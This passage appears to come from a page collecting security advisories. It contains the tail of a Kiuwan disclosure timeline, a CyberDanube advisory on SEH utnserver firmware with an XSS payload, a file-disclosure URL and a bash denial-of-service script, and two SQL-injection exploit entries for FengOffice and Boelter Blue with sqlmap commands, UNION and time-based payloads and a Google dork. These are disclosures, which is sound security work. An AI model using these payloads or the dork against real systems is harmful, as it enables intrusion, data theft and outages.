to meet quality standards for delivery.<br />2024-04-25: Asking for a status update, so far no download link was provided.<br /> Wondering why cloud patches get prioritized although KOP users pay<br /> an additional premium for licensing.<br />2024-04-29: Vendor: review for upcoming KOP release is finalized, product management<br /> team will contact us shortly.<br />2024-05-03: Vendor: Kiuwan On Premise testing finishes by 6th May. If no issues found,<br /> KOP will be released in week of 13th May.<br />2024-05-17: Vendor: Download link was planned for today, but technical team faced issues<br /> to provide a pre-release build for us. Provided changelog, but still no<br /> fixed version number. Vendor informs us that our reported security<br /> vulnerabilities were fixed.<br />2024-05-21: Asking Kiuwan to confirm that our submitted security issues have really<br /> been fixed (mentioned in changelog from February 2024). Asking for a<br /> public download link (no pre-release build) and version number.<br />2024-05-22: Vendor: passed information about five vulnerabilities to Kiuwan team<br /> for verification, but our five reported issues should be fixed.<br /> Version number not available before GA release.<br /> Targeting release for early next week.<br />2024-06-01: Vendor informs us that a new KOP version was released, provides changelog<br /> and reference numbers, upgrade guide.<br />2024-06-06: Coordinated release of security advisory.<br /><br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version master.1808.p685.q13371 which should be installed<br />immediately. See the changelog from the vendor:<br /><br />https://www.kiuwan.com/docs/display/K5/%5B2024-05-30%5D+Change+Log<br /><br />* XML External Entity Injection => CVE-2023-49110 is SAS-6851 fixed on release 2024-02-06<br />* Services Running as Root => is SAS-6856 and SAS-6857 fixed on release 2024-05-15<br />* Reflected Cross-site-scripting => CVE-2023-49111 is SAS-6852 fixed on release 2024-02-06<br />* Insecure Direct Object Reference => CVE-2023-49112 is SAS-6853 fixed on release 2024-02-06<br />* Sensitive Data Stored Insecurely => CVE-2023-49113 is SAS-6854, SAS-6855, SAS-6858, and SAS-6859 fixed on release 2024-02-06<br /><br /><br />The following upgrade guide was provided by the vendor:<br />https://www.kiuwan.com/docs/display/K5/Kiuwan+On-Premises+Distributed+Upgrade+Guide<br /><br /><br />Although initially communicated otherwise during responsible disclosure in 2022-2023<br />(see timeline above), the vendor confirmed in 2024 that the SaaS/cloud version is affected<br />and will also be patched. The patch date was 2024-02-05, version 2.8.2402.3.<br /><br />SEC Consult also submitted further security issues to Kiuwan, such as Docker-related<br />configuration issues which were also fixed during our responsible disclosure.<br />* Sensitive Data Stored Insecurely for MySQL<br />* Sensitive Data displayed for wildfly<br />* Containers Running as root User<br />* Containers running in the host network<br />* Exposure of Internal Services<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Constantin Schwarz, Johannes Greil / @2024<br /></code></pre>
<pre><code>CyberDanube Security Research 20240604-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| SEH utnserver Pro/ProMAX / INU-100<br /> vulnerable version| 20.1.22<br /> fixed version| 20.1.28<br /> CVE number| CVE-2024-5420, CVE-2024-5421, CVE-2024-5422<br /> impact| High<br /> homepage| https://www.seh-technology.com/<br /> found| 2024-03-04<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"We are SEH from Bielefeld - manufacturer of high-quality network solutions.<br />With over 35 years of experience in the fields of printing and networks, we<br />offer our customers a broad and high-level expertise in solutions for all types<br />of business environments."<br /><br />Source: https://www.seh-technology.com/us/company/about-us.html<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />utnserver Pro / 20.1.22<br />utnserver ProMAX / 20.1.22<br />INU-100 / 20.1.22<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5420)<br />A Stored Cross-Site Scripting vulnerability was identified in the web interface<br />of the device. Multiple parameters, e.g. the device description, can be abused<br />to inject JavaScript code. An attacker can exploit this vulnerability by luring<br />a victim to visit a malicious website. Furthermore, it is possible to hijack<br />the session of the attacked user.<br /><br />2) Authenticated File Disclosure (CVE-2024-5421)<br />Files and content of directories can be disclosed by integrated functions of<br />the device.<br /><br />3) Denial of Service (CVE-2024-5422)<br />A Denial-of-Service vulnerability has been identified in the web interface of<br />the device. This can be triggered by sending a lot of requests that trigger<br />serial interface access on the device.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5420)<br />By accessing to the following URL, an attacker can modify the device<br />description:<br />http://$IP/device/description_en.html<br /><br />By using malicious JavaScript payload, it is possible to execute arbitrary<br />code. This snippet demonstrates such a payload:<br />"><script>alert(document.location)</script><br /><br />Saving this text to the device description leads to a persistent cross-site<br />scripting. Therefore, everyone who openes the device description executes the<br />injected code in the context of the own browser.<br /><br />2) Authenticated File Disclosure (CVE-2024-5421)<br />A hidden function in the web-interface of the device can be used to disclose<br />directories and files on operating system level. The function can be accessed<br />directly via the browser:<br /><br />http://$IP/info/dir?/<br /><br />This lists the current directory and provides the files to be downloaded.<br /><br />3) Denial of Service (CVE-2024-5422)<br />For triggering a denial of service on the device, multiple file descriptors<br />are opened by using the following script:<br />-------------------------------------------------------------------------------<br />#!/bin/bash<br />echo "Parameters: $1 $2"<br />last_iter=$(($2 - 1))<br />for ((i=1; i<=$2; i++))<br /> do<br /> echo "[$i] Downloading application binary"<br /> if [[ "$i" == "$last_iter" ]];then<br /> curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null<br /> else<br /> curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null &<br /> fi<br />done<br />-------------------------------------------------------------------------------<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Install firmware version 20.1.28 to fix the vulnerabilities.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to<br />the latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent<br /> advisory to support.<br />2024-03-20: Asked for an update. Contact stated, that an internal timeline will<br /> be defined.<br />2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will<br /> be patched soon.<br />2024-04-16: Contact sent link to patched firmware release candidate.<br />2024-05-31: Notified SEH Computertechnik that advisory will be released first<br /> week of June. Received confirmation from SEH Computertechnik.<br />2024-06-04: Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2024<br /><br /></code></pre>
<pre><code># Exploit Title: FengOffice - Blind SQL Injection<br /># Date: 06/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 3.11.1.2<br /># Tested on: Ubuntu 22.04<br /># Blog:<br />https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.html<br /><br />Steps to Reproduce:<br /><br /><br /> 1. Login to application<br /> 2. Click on "Workspaces"<br /> 3. Copy full URL<br /> 4. Paste the HTTP GET request into text file<br /> 5. Set the injection point to be in the "dim" parameter value<br /> 6. Use SQLMap to automate the process<br /><br /><br />sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim<br />--fingerprint<br /><br />[...]<br />[12:13:03] [INFO] confirming MySQL<br />[12:13:04] [INFO] the back-end DBMS is MySQL<br />[12:13:04] [INFO] actively fingerprinting MySQL<br />[12:13:05] [INFO] executing MySQL comment injection fingerprint<br />web application technology: Apache<br />back-end DBMS: active fingerprint: MySQL >= 5.7<br /> comment injection fingerprint: MySQL 5.7.37<br />[...]<br /><br /></code></pre>
<pre><code>Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)<br />Google Dork: inurl:"Powered by Boelter Blue"<br />Date: 2024-06-04<br />Exploit Author: CBKB (DeadlyData, R4d1x)<br />Vendor Homepage: https://www.boelterblue.com<br />Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US<br />Version: 1.3<br />Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12<br />CVE: CVE-2024-36840<br /><br />Vulnerability Details:<br />Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.<br /><br />PoC:<br />web server operating system: Linux Debian 9 (stretch)<br />web application technology: Apache 2.4.25<br />back-end DBMS: MySQL >= 5.0.12<br />[22:21:39] [INFO] fetching database names<br />available databases [5]:<br />[*] Anchor5Digital<br /><br />1. news_details.php?id parameter:<br /><br />Type: Boolean-based blind<br />Payload: id=10071 AND 4036=4036<br /><br />Type: Time-based blind<br />Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)<br /><br />Type: UNION query<br />Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--<br /><br />Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs<br /><br />2. services.php?section parameter:<br /><br />Type: Boolean-based blind<br />Payload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))<br /><br />Type: Time-based blind<br />Payload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)<br /><br />Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs<br /><br />3. location_details.php?id parameter:<br /><br />Type: Boolean-based blind<br />Payload: id=836 AND 4036=4036<br /><br />Type: Time-based blind<br />Payload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)<br /><br />Type: UNION query<br />Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--<br /><br />Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs<br /><br />Impact:<br />Unauthorized access to the database.<br />Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.<br />Account takeovers and potential full control of the affected application.<br /><br />Discoverer(s)/Credits:<br />CBKB (DeadlyData, R4d1x)<br /><br />References:<br />https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840<br /></code></pre>